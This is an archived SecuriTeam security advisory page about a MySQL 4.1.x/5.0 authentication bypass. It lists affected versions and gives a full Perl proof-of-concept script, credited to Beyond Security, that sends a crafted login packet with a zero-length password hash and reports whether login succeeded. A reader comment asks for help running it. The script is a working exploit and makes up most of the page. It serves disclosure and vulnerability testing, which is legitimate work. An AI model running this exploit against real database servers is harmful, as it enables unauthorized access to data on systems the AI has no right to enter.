Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key).	MySQL Authentication Bypass Exploit 7 Jul. 2004    Summary The MySQL" database server is the world's most popular open source database." An authentication vulnerability was reported in our previous article, 'MySQL Authentication Bypass', which allows a remote attack to connect to the vulnerable MySQL server and authenticate using a zero-length password. A proof-of-concept script has been provided that can help test the vulnerability against vulnerable servers.   Credit: The information has been provided by Eli Kara of SecuriTeam Experts. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable Systems:  * MySQL version 4.1.0 up to but not including MySQL version 4.1.3  * MySQL version 5.0 Immune Systems:  * MySQL version 4.1.3 The following Perl script can be used to test your version of MySQL. It will display the login packet sent to the server and it's reply: #!/usr/bin/perl # # The script connects to MySQL and attempts to log in using a zero-length password # Based on the vuln found by NGSSecurity # # Exploit copyright (c) 2004 by Eli Kara, Beyond Security # <elik@beyondsecurity.com> # use strict; use IO::Socket::INET; usage() unless ((@ARGV >= 1) || (@ARGV <= 3)); my $username = shift(@ARGV); my $host = shift(@ARGV); if (!$host) {   usage(); } my $port = shift(@ARGV); if (!$port) {  $port = 3306; print "Using default MySQL port (3306)\n"; } # create the socket my $socket = IO::Socket::INET->new(proto=>'tcp', PeerAddr=>$host, PeerPort=>$port); $socket or die "Cannot connect to host!\n"; # receive greeting my $reply; recv($socket, $reply, 1024, 0); if (length($reply) < 7) {  print "Not allowed to connect to MySQL!\n";  exit(1); } print "Received greeting:\n"; HexDump($reply); print "\n"; # here we define the login OK reply # my $login_ok = "\x01\x00\x00\x02\xFE"; # break the username string into chars and rebuild it my $binuser = pack("C*", unpack("C*", $username)); # send login caps packet with password my $packet = "\x85\xa6".              "\x03\x00\x00".     "\x00".     "\x00\x01\x08\x00\x00\x00". # capabilities, max packet, etc..              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00".              "\x00\x00\x00\x00".$binuser."\x00\x14\x00\x00\x00\x00". # username and pword hash length + NULL hash              "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"; # continue NULL hash substr($packet, 0, 0) = pack("C1", length($packet)) . "\x00\x00\x01"; # MySQL message length + packet number (1) print "Sending caps packet:\n"; HexDump($packet); print "\n"; send $socket, $packet, 0; # receive reply recv($socket, $reply, 1024, 0); print "Received reply:\n"; HexDump($reply); my @list_bytes = unpack("C*", $reply); #print "The fifth byte is: ", $list_bytes[4], "\n"; if (scalar @list_bytes <= 4) {  print "Response insufficent\n"; } #if ($reply eq $login_ok) if ($list_bytes[4] == 0 || $list_bytes[4] == 254) {  print "Received OK reply, authentication successful!!\n"; } else {  print "Authentication failed!\n"; } # close close($socket); sub usage {     # print usage information     print "\nUsage: mysql_auth_bypass_zeropass.pl <username> <host> [port]\n <username> - The DB username to authenticate as <host> - The host to connect to [port] - The TCP port which MySQL is listening on (optional, default is 3306)\n\n";     exit(1); } ### # do a hexdump of a string (assuming it's binary) ### sub HexDump {  my $buffer = $_[0];  # unpack it into chars  my @up = unpack("C*", $buffer);  my $pos=0;  # calculate matrix sizes  my $rows = int(@up/16);  my $leftover = int(@up%16);  for( my $row=0; $row < $rows ; $row++, $pos+=16)  {   printf("%08X\t", $pos);   my @values = @up[$pos .. $pos+15];   my @line;   foreach my $val (@values)   {    push(@line, sprintf("%02X", $val));   }   print join(' ', @line), "\n";  }  # print last line  printf("%08X\t", $pos);  my @values = @up[$pos .. $pos+$leftover-1];  my @line;  foreach my $val (@values)  {   push(@line, sprintf("%02X", $val));  }  print join(' ', @line), "\n"; }  Comments: Subject:  Errors  Date:  7 Oct. 2008 From: westnileraversgmail.com When trying to run this to test my local server I get following errors. ./3306.pl 3306.pl: line 1: use: command not found 3306.pl: line 1: $'\r': command not found 3306.pl: line 2: use: command not found 3306.pl: line 2: $'\r': command not found 3306.pl: line 3: $'\r': command not found 3306.pl: line 4: syntax error near unexpected token `unless' 3306.pl: line 4: `usage() unless ((@ARGV >= 1) || (@ARGV <= 3)); When trying a different method and trying to compile it I get even more. Anyone mind helpin me to understand what I did wrong when I tried to execute this on my own server and got the above errors?  Add new comment:  Subject:  Name/Nick/Email:          Chars Left:	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit) Opera file:// Overflow Stack-Based Buffer Overflow in the Network Manager of Castle Rock Computing (SNMPc) PacketTrap TFTPD DoS  Featured Articles Microsoft Embedded OpenType Font Engine Heap Buffer Overflow (MS09-029) Virtualmin Multiple Vulnerabilities Microsoft WordPad Word97 Converter Stack Buffer Overflow Vulnerability (MS09-010) WordPress Unchecked Privileges in admin.php and Multiple Information Disclosures Microsoft PowerPoint Conversion Filter Heap Corruption Vulnerability (MS09-017) Adobe Shockwave Player Director File Parsing Pointer Overwrite Mozilla Firefox Java Applet Loading Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2010 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®